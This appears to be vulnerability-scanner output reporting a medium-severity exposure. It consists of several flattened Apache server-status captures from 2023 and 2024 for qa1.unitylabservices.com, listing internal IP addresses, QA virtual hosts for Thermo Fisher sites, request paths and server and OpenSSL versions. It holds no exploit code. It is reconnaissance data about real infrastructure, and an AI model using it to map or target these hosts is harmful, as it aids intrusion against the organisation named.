10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-01563820/170/12608K 0.4146314769821324.12.49301.83 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/hcp/global/en/patient-management-overv 20-0842611/95/12437K 0.5212512148368528.31.05163.75 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-0117060/58/13754_ 0.212661116116000.00.34131.81 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0-0/0/14279. 0.002534012452820.00.00219.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0100347/23/13271K 0.0517612123232527.80.10199.84 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 24-0-0/0/13486. 0.002537011989880.00.00146.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 25-0145250/12/14119_ 0.021921112098920.00.03163.55 10.253.106.226http/1.1 26-0-0/0/13597. 0.002532011633390.00.00158.18 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-0195971/292/48959K 0.742110893721.11.45153.48 10.253.106.226http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 28-0117086/13/12222K 0.0596101093097513.70.09104.90 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0104570/52/12821_ 0.472161217137270.01.19224.88 10.253.106.226http/1.1 30-0250085/180/12588K 0.4029310101850711.10.95112.72 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-0117090/56/13782_ 0.42176128920570.01.37198.07 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-0130012/10/13075K 0.012491311762824.40.03162.11 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-0176703728/4111/103178K 4.17525506246885.48.86215.10 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0-0/0/13073. 0.002530014094330.00.0095.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 35-0-0/0/13636. 0.002844015620760.00.00118.95 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0176750/600/12893R 1.9658111648814420.010.62129.17 10.253.106.203http/1.1 37-0103063729/3859/15149K 2.698013511346887.27.1496.99 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0227108/128/13021K 0.53511127941018.60.9995.94 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-01300312/25/11855K 0.0622211849667136.30.21139.14 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-01300412/60/10991K 0.134811700282470.00.6094.62 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/hcp/global/en/patient-management-overv 41-028050/57/11833R 0.165191110225370.00.49107.57 10.253.106.226http/1.1 42-0-0/0/11576. 0.002535015361270.00.00111.22 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0145260/38/12610_ 0.08681012448220.00.14123.65 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0-0/0/11293. 0.00290209321790.00.00191.65 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 45-0145300/20/10625R 0.03628112436070.00.06184.60 10.253.106.226http/1.1 46-0117110/42/11127R 0.194491210942230.01.04167.47 10.253.106.203http/1.1 47-0145310/6/11920_ 0.013478310898000.00.02135.13 10.253.106.203http/1.1 48-0139740/148/10260_ 0.52266609893720.01.27167.32 10.253.106.20
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127ccea714ec
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 24-May-2024 04:58:20 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 days 14 hours 58 minutes 31 seconds Server load: 0.00 0.03 0.00 Total accesses: 1253314 - Total Traffic: 11.1 GB - Total Duration: 78326790 CPU Usage: u56.74 s181.4 cu1912.88 cs1155.97 - .23% CPU load .873 requests/sec - 8.1 kB/second - 9.3 kB/request - 62.4957 ms/request 46 requests currently being processed, 30 idle workers _KKK_______K_K____K__W_KKKK_RR.KKK_KKK__RK..K..R...K_..R_KKKKK.. _KR_..K__.K.R_R...KRKK.R_K._.KK.....K..._K...................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0156490/0/12193_ 0.0022637198880.00.0098.26 10.253.106.246http/1.1 1-01464621/47/11982K 0.09297074477157.50.17120.36 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/clientlibs/granite/uti 2-0875017931/83502/86991K 60.2080406248153622.4162.35213.36 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-0156506/41/12260K 0.17298082648816.92.46153.08 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 4-0189990/0/12859_ 0.001608861340.00.00144.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0146480/30/12676_ 0.06163118684010.00.10159.07 10.253.106.246http/1.1 6-0148510/8/12538_ 0.02163139676520.00.05390.22 10.253.106.246http/1.1 7-0113650/56/12137_ 0.20258012460770.00.9296.23 10.253.106.246http/1.1 8-0156510/12/12002_ 0.021651213611780.00.03107.07 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0146490/9/13001_ 0.05163388763610.00.15123.51 10.253.106.162http/1.1 10-0146500/10/11873_ 0.0014908130810.00.26164.85 10.253.106.246http/1.1 11-0291002/105/22108K 0.4229808409935.61.38122.92 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc.clientlibs/diagnostics/components 12-0156520/0/11703_ 0.0021609166350.00.00231.92 10.253.106.162http/1.1 13-01139535/89/12493K 0.261637821642150.30.63120.70 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.css H 14-0156530/5/12833_ 0.01193138581070.00.02212.73 10.253.106.246http/1.1 15-0156540/0/24425_ 0.0019708888700.00.00135.43 10.253.106.162http/1.1 16-0156550/2/60397_ 0.00189287134510.00.00171.39 10.253.106.162http/1.1 17-0156690/0/11840_ 0.0018609556200.00.00126.02 10.253.106.246http/1.1 18-0113973/41/11286K 0.21297097957714.90.31109.51 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /diagnostic-education/etc/designs/diagnostics/vendor/ofi.mi 19-0177760/0/11344_ 0.00156011571070.00.00291.92 10.253.106.162http/1.1 20-0106410/58/11446_ 0.152161013698180.00.27156.87 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-01830015/15/12681W 0.06001077550103.90.10120.06 10.253.106.162http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 22-0113990/85/12978_ 0.30237119563570.00.45210.09 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-01331716/56/11810K 0.14270296266686.50.22127.91 10.253.106.246http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2024.1.0.c 24-0114002/78/12205K 0.161609775044.00.44132.67 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/slick_carousel.mi 25-0148533/12/12990K 0.23220366872343114.70.57152.61 10.253.106.246http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/handlebars/compiled/templ 26-01485514/62/12139K 0.70220959048201017.72.00141.56 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.css?v= HTT 27-0291010/54/47565_ 0.12168117673740.00.19142.07 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0148560/37/11484R 0.14540158423150.00.5193.75 10.253.106.246http/1.1 29-0183010/0/11542R 0.00296012203680.00.00137.49 10.253.106.162http/1.1 30-0-0/0/11547. 0.0016006483440.00.0097.34 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0183021/1/12746K 0.0016076388011.40.0197.37 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-recen 32-01064633/71/11666K 0.59188128662571528.71.68145.18 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-01632627931/93532/96410K 72.2910270069171981.3168.40198.14 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0133180/13/11551_ 0.0615529571960.00.1484.49 10.253.106.162http/1.1 35-0252652/308/12473K 0.68160989219162.12.69107.55 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-site.min.js HT 36-0183051/1/12159K 0.001606626783.20.00118.04 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/js_cookie.min.js 37-0183063/3/10471K 0.03410105391457.70.0683.36 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-0183070/0/11773_ 0.0029508287890.00.0086.14 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 39-0138040/43/10916_ 0.15262116544110.00.3398.55 10.253.106.246http/1.1 40-0183080/0/10259R 0.0029506332810.00.0090.54 10.253.106.246http/1.1 41-01384525/89/10600K 0.23220174934304135.40.4499.11 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.css?v= HTTP/ 42-0-0/0/10755. 0.002203011613320.00.00103.23 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0-0/0/11582. 0.00220109795640.00.00113.36 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0138477/33/10452K 0.08160716029110.60.32185.47 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-image 45-0-0/0/9963. 0.00167011509790.00.00177.58 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0-0/0/10623. 0.001833010119630.00.00108.47 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0138490/34/10809R 0.5746889292010.01.08123.99 10.253.106.162http/1.1 48-0-0/0/9548. 0.00222208998260.00.00107.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0-0/0/10737. 0.00<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127cd75f3603
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 23-May-2024 03:52:55 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 15 days 13 hours 53 minutes 5 seconds Server load: 0.00 0.01 0.00 Total accesses: 1101269 - Total Traffic: 10.2 GB - Total Duration: 66762477 CPU Usage: u74.36 s193.67 cu1722.55 cs959.75 - .219% CPU load .818 requests/sec - 8.0 kB/second - 9.8 kB/request - 60.6232 ms/request 39 requests currently being processed, 34 idle workers KKK_K_______WR__KKRR_KKRKKRK__R_KK_RK_K.K.K._._K_K_KK_K..KR____K ___RR_.K___R._........K........K_............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-069319/360/10746K 0.789063035046.11.1690.78 10.253.106.246http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2024.1.0.css HT 1-0286123/413/10539K 1.25109106545198.22.80114.12 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-087508899/74470/77959K 53.8920399866136959.6146.07197.09 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 3-012220/568/10742_ 1.29251877148790.01.69142.64 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 4-0685118/213/10847K 0.471671278304242.00.82135.96 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-015530/360/11297_ 0.75100117178850.01.07152.55 10.253.106.246http/1.1 6-051880/473/10798_ 1.13189118602100.01.61382.93 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0192450/58/10309_ 0.1418011710809640.00.1588.72 10.253.106.246http/1.1 8-06960/298/10408_ 0.82151312581060.02.0198.49 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-065330/531/11208_ 1.12273107162830.01.65115.55 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-037930/214/10672_ 0.50137117229250.00.66158.97 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-065340/368/20622_ 0.9821707417330.01.82107.21 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /content/dam/diagnostics/components/structure/icons/favicon 12-0846533/450/10202W 0.990076092477.11.42222.50 10.253.106.162http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 13-085530/568/10841R 1.38472107225340.02.1792.72 10.253.106.162http/1.1 14-0300080/321/11150_ 0.88308137559890.01.24204.85 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-037960/322/22895_ 0.811007930930.01.44126.24 10.253.106.162http/1.1 16-0399220/32/58899K 0.061111161735365.20.09163.94 10.253.106.246http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-03189119/211/10216K 0.432811178930945.90.48118.03 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-037970/211/9734R 0.44409128021780.00.5799.65 10.253.106.246http/1.1 19-012380/475/9948R 1.1031589930810.01.76284.88 10.253.106.246http/1.1 20-062280/243/9990_ 0.49126812236750.01.12150.10 10.253.106.246http/1.1 21-010603/24/10986K 0.04909870814.20.05113.12 10.253.106.162http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/tabletlibs.min.2024.1.0.c 22-084866/672/11477K 1.491751080326015.72.35203.05 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 23-06970/234/10249R 0.56481108119330.01.40120.32 10.253.106.246http/1.1 24-039966/13/10158K 0.02981284499815.30.03121.90 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0653640/780/11479K 1.729710778719204.22.45103.04 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-06980/283/10383R 0.70314128026810.00.82133.62 10.253.106.162http/1.1 27-03000981/323/45662K 0.79107535722220.51.59132.47 10.253.106.162http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.html HTTP/1.1 28-06990/390/9885_ 1.0077116975730.02.8677.43 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 29-0277070/394/10173_ 1.12491011302500.01.77130.87 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-085770/383/10263R 0.90467115598130.01.3889.22 10.253.106.162http/1.1 31-0277080/540/10756_ 1.20217126322080.01.6284.42 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/bootstrap.min.js HTTP/1.1 32-057542/578/9889K 1.3321711756006112.82.25137.41 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-01632618898/84499/87377K 65.3360263057155316.8152.13181.87 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-011050/85/10083_ 0.17217118535510.00.4376.54 10.253.106.162http/1.1 35-037990/250/10695R 0.544696268866220.00.6098.88 10.253.106.246http/1.1 36-038004/272/10214K 0.9011152805111.71.5897.41 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-011060/71/9026_ 0.26166128994760.00.5976.15 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-0399736/76/10388K 0.1551068092499.50.2078.28 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-0-0/0/9265. 0.00945805655640.00.0090.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-070017/262/8833K 0.571891052591247.20.6884.03 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0-0/0/9286. 0.00950006182190.00.0088.46 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-070212/112/9449K 0.4418311101917029.02.7698.52 10.253.106.246http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0-0/0/10322. 0.00412308532950.00.00107.57 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-051980/447/9226_ 0.96108136324840.01.63179.88 10.253.106.162http/1.1 45-0-0/0/9108. 0.004747010924810.00.00174.56 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-07030/373/8915_ 0.9210125301380.02.3390.66 10.253.106.162http/1.1 47-0322362/164/9475K 0.64249108293124.61.37116.50 10.253.106.16
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c730b722b
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 12-May-2024 19:52:59 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 5 days 5 hours 53 minutes 10 seconds Server load: 0.00 0.05 0.02 Total accesses: 273826 - Total Traffic: 2.4 GB - Total Duration: 17911379 CPU Usage: u46.35 s56.13 cu500.17 cs171.1 - .171% CPU load .604 requests/sec - 5.6 kB/second - 9.3 kB/request - 65.4115 ms/request 43 requests currently being processed, 33 idle workers RKRK_KR___K_R_KKKRK_KK__R__KRRRRRRK_KK_RR_K_R_W_K__R_____....___ ....K._._....R.R.K.._._.__.KRK..RR...K.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-014120/70/2322R 0.16305102112740.00.1927.22 10.253.106.183http/1.1 1-062555/155/2313K 0.491481021450015.30.6837.62 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0155830/95/2224R 0.19362102812790.00.4329.88 10.253.106.162http/1.1 3-014254/27/2454K 0.1320762416165036.10.2022.57 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /allergy/wo/de/allergy-types-symptoms/indoor-allergies.html 4-0101140/34/2648_ 0.1036101970900.00.5156.73 10.253.106.162http/1.1 5-014268/88/2168K 0.20142123406558.90.8122.93 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2020. 6-078870/57/2718R 0.13631102727460.00.6745.31 10.253.106.183http/1.1 7-078890/34/2194_ 0.0883101717960.00.3028.04 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-0155850/83/2496_ 0.171591776410.00.4925.94 10.253.106.183http/1.1 9-0102240/19/2461_ 0.0521101625230.00.1520.40 10.253.106.183http/1.1 10-0475220/175/2693K 0.4310210238954169.51.0727.30 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0102320/7/2842_ 0.0124102077020.00.0230.66 10.253.106.162http/1.1 12-0155860/110/2443R 0.21467102526790.00.5535.26 10.253.106.162http/1.1 13-0214620/154/2546_ 0.33102411810800.00.9522.21 10.253.106.162http/1.1 14-0182151/166/2546K 0.351401401523.60.9225.21 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2020.1.0.css HT 15-078902/54/14581K 0.1098101051694.31.5754.75 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-039145319/45319/45319K 28.46302907083067.381.1281.12 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 17-020460/102/2472R 0.24520101467920.00.3937.99 10.253.106.183http/1.1 18-0202566/191/2557K 0.694254216661470.11.6333.05 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /content/dam/allergy/en/documents/clinical-resources/wo/man 19-0112260/26/2483_ 0.05109101814690.00.1724.53 10.253.106.162http/1.1 20-0112274/5/2282K 0.0404215617121.30.1522.30 10.253.106.162http/1.1qa1.thermofisher.in:80GET /chemicals/en/layout/scientific/jcr:content/header-par.html 21-0312281/72/2477K 0.1814322307811.50.4448.93 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2020.1.0.c 22-028790/203/2691_ 0.74230112258780.02.2941.86 10.253.106.183http/1.1 23-0312610/139/2758_ 0.2813731412340.00.8223.18 10.253.106.162http/1.1 24-020490/46/2228R 0.14432101572930.03.2939.02 10.253.106.162http/1.1 25-020500/69/2415_ 0.3912591896680.00.9728.00 10.253.106.162http/1.1 26-020510/47/2307_ 0.14227101490850.00.2627.66 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-02735632558/32613/33289K 21.14509621359773.959.7565.06 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 28-0256100/27/2093R 0.0650591871550.00.3419.91 10.253.106.162http/1.1 29-0146700/204/2551R 0.5960291371570.01.2622.09 10.253.106.162http/1.1 30-067710/52/2201R 0.36602101624560.00.8933.61 10.253.106.183http/1.1 31-078910/42/2694R 0.08451101721100.00.3120.43 10.253.106.183http/1.1 32-078920/48/1953R 0.27592101446290.00.6129.15 10.253.106.183http/1.1 33-0197860/199/2627R 0.63530101845020.02.2028.16 10.253.106.183http/1.1 34-06387/102/2417K 0.472421024322415.73.6526.22 10.253.106.183http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-0202570/464/2738_ 1.606102289740.04.5824.18 10.253.106.183http/1.1 36-0105953/224/2607K 1.3814016006521.53.7328.29 10.253.106.162http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.globalconfig.js HTTP/1.1 37-0112288/45/2266K 0.13274920434720.10.5021.46 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-078930/25/2359_ 0.251581021342720.00.6720.98 10.253.106.183http/1.1 39-078940/47/2299R 0.1049491805060.00.3825.84 10.253.106.183http/1.1 40-0112290/1/1809R 0.00291541184080.00.0019.63 10.253.106.183http/1.1 41-0117120/10/1890_ 0.02230101390230.00.1922.30 10.253.106.162http/1.1 42-0117131/25/2143K 0.051401293881.30.2732.38 10.253.106.162http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.globalconfig.js HTTP/1.1 43-0117140/58/2105_ 0.2589102042450.01.6822.10 10.253.106.162http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0256110/9/2367R 0.01363102128640.00.0225.86 10.253.106.162http/1.1 45-0100320/119/1950_ 0.52230176850440.01.5622.20 10.253.106.162http/1.1www-qa.patheon.cn:80GET /etc.clientlibs/patheon/clientlibs/clientlib-site.min.css H 46-02561211/35/2131W 0.2400180432382.71.0040.31 10.253.106.162http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 47-0305330/0/2061_ 0.001301630910.00.0017.90 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0161561/177/2017K 0.61142417221639.71.3737.17 10.253.106.183http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs-global.min.2020. 49-0305340/0/2083_ 0.001201543480.00.0029.98 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0214640/156/2080_ 0.35125101521220.00.7830.04 10.253.106.162http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c5b4f5050
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 10-Sep-2023 11:07:57 EDT Restart Time: Friday, 08-Sep-2023 11:09:24 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 23 hours 58 minutes 33 seconds Server load: 0.00 0.00 0.00 Total accesses: 52156 - Total Traffic: 1.2 GB - Total Duration: 2058053 CPU Usage: u7.21 s18.64 cu56.75 cs22.12 - .0606% CPU load .302 requests/sec - 7.4 kB/second - 24.4 kB/request - 39.4596 ms/request 26 requests currently being processed, 31 idle workers _RR___R_RR_R_R_RK_____R____W_R_RRR_K.RKRRRR_._.._.K_R.._._..___R R__............................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0276610/0/231_ 0.00280170520.00.002.98 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 1-0253370/1/219R 0.006040147620.00.002.96 10.253.106.184http/1.1 2-0263850/15/188R 0.00574096950.00.037.82 10.253.106.191http/1.1 3-0230200/1/10736_ 0.001560142960.00.0021.11 10.253.100.5http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 4-0276620/0/282_ 0.00270275700.00.004.16 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0276630/0/10437_ 0.0027096080.00.0018.74 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 